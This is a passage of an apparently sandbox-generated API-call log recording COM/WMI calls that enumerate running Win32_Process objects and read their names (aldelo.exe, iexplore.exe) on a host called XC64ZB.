varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4472\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.444] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4472\"") returned 0x5e [0265.444] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4472\"") returned 0x5e [0265.444] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.444] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.444] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.444] IUnknown:Release (This=0x601a94) returned 0x1 [0265.445] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.446] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.446] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552aa88) returned 0x0 [0265.446] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.446] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa88, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552aa88) returned 0x0 [0265.446] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa88, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.446] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa88, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.447] WbemDefPath:IUnknown:AddRef (This=0x552aa88) returned 0x3 [0265.447] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa88, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.447] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa88, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.447] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa88, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5537420) returned 0x0 [0265.447] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5537420, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.447] WbemDefPath:IUnknown:Release (This=0x5537420) returned 0x3 [0265.447] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa88, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.447] WbemDefPath:IUnknown:Release (This=0x552aa88) returned 0x2 [0265.447] WbemDefPath:IUnknown:Release (This=0x552aa88) returned 0x1 [0265.448] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa88, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552aa88) returned 0x0 [0265.448] WbemDefPath:IUnknown:AddRef (This=0x552aa88) returned 0x3 [0265.448] WbemDefPath:IUnknown:Release (This=0x552aa88) returned 0x2 [0265.448] WbemDefPath:IWbemPath:SetText (This=0x552aa88, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4472\"") returned 0x0 [0265.448] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.448] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.448] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.448] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.448] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.448] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.448] IWbemClassObject:Get (in: This=0x5539e08, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ec7c8*=0, plFlavor=0x23ec7cc*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="aldelo.exe", varVal2=0x0), pType=0x23ec7c8*=8, plFlavor=0x23ec7cc*=0) returned 0x0 [0265.448] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0265.448] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0265.448] IWbemClassObject:Get (in: This=0x5539e08, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ec7c8*=8, plFlavor=0x23ec7cc*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="aldelo.exe", varVal2=0x0), pType=0x23ec7c8*=8, plFlavor=0x23ec7cc*=0) returned 0x0 [0265.448] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0265.448] SysStringByteLen (bstr="aldelo.exe") returned 0x14 [0265.448] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.448] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x5539c70, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.449] IUnknown:QueryInterface (in: This=0x5539c70, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5539c70) returned 0x0 [0265.449] IUnknown:QueryInterface (in: This=0x5539c70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.449] IUnknown:QueryInterface (in: This=0x5539c70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.449] IUnknown:QueryInterface (in: This=0x5539c70, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.450] IUnknown:AddRef (This=0x5539c70) returned 0x3 [0265.450] IUnknown:QueryInterface (in: This=0x5539c70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.450] IUnknown:QueryInterface (in: This=0x5539c70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.450] IUnknown:QueryInterface (in: This=0x5539c70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5539c74) returned 0x0 [0265.450] IMarshal:GetUnmarshalClass (in: This=0x5539c74, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.450] IUnknown:Release (This=0x5539c74) returned 0x3 [0265.450] IUnknown:QueryInterface (in: This=0x5539c70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.450] IUnknown:Release (This=0x5539c70) returned 0x2 [0265.450] IUnknown:QueryInterface (in: This=0x5539c70, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5539c70) returned 0x0 [0265.450] IUnknown:AddRef (This=0x5539c70) returned 0x4 [0265.450] IUnknown:Release (This=0x5539c70) returned 0x3 [0265.450] IUnknown:Release (This=0x5539c70) returned 0x2 [0265.450] CoTaskMemFree (pv=0x54ba2d8) [0265.450] IUnknown:AddRef (This=0x5539c70) returned 0x3 [0265.450] IWbemClassObject:Get (in: This=0x5539c70, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.450] IWbemClassObject:Get (in: This=0x5539c70, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4672\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.451] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4672\"") returned 0x5e [0265.451] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4672\"") returned 0x5e [0265.451] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.451] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.451] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.451] IUnknown:Release (This=0x601a94) returned 0x1 [0265.452] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.452] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552aaf8) returned 0x0 [0265.452] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aaf8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552aaf8) returned 0x0 [0265.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aaf8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aaf8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.452] WbemDefPath:IUnknown:AddRef (This=0x552aaf8) returned 0x3 [0265.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aaf8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aaf8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.453] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aaf8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5537558) returned 0x0 [0265.453] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5537558, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.453] WbemDefPath:IUnknown:Release (This=0x5537558) returned 0x3 [0265.453] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aaf8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.453] WbemDefPath:IUnknown:Release (This=0x552aaf8) returned 0x2 [0265.453] WbemDefPath:IUnknown:Release (This=0x552aaf8) returned 0x1 [0265.453] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aaf8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552aaf8) returned 0x0 [0265.453] WbemDefPath:IUnknown:AddRef (This=0x552aaf8) returned 0x3 [0265.453] WbemDefPath:IUnknown:Release (This=0x552aaf8) returned 0x2 [0265.453] WbemDefPath:IWbemPath:SetText (This=0x552aaf8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4672\"") returned 0x0 [0265.453] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.453] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.453] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.453] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.453] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.453] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.454] IWbemClassObject:Get (in: This=0x5539c70, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ed054*=0, plFlavor=0x23ed058*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x23ed054*=8, plFlavor=0x23ed058*=0) returned 0x0 [0265.454] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0265.454] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0265.454] IWbemClassObject:Get (in: This=0x5539c70, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ed054*=8, plFlavor=0x23ed058*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x23ed054*=8, plFlavor=0x23ed058*=0) returned 0x0 [0265.454] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0265.454] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0265.454] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.454] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x553aac8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.455] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x553aac8) returned 0x0 [0265.455] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.455] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.455] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.455] IUnknown:AddRef (This=0x553aac8) returned 0x3 [0265.455] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.455] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.455] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x553aacc) returned 0x0 [0265.457] IMarshal:GetUnmarshalClass (in: This=0x553aacc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.457] IUnknown:Release (This=0x553aacc) returned 0x3 [0265.457] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.457] IUnknown:Release (This=0x553aac8) returned 0x2 [0265.458] IUnknown:QueryInterface (in: This=0x553aac8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x553aac8) returned 0x0 [0265.458] IUnknown:AddRef (This=0x553aac8) returned 0x4 [0265.458] IUnknown:Release (This=0x553aac8) returned 0x3 [0265.458] IUnknown:Release (This=0x553aac8) returned 0x2 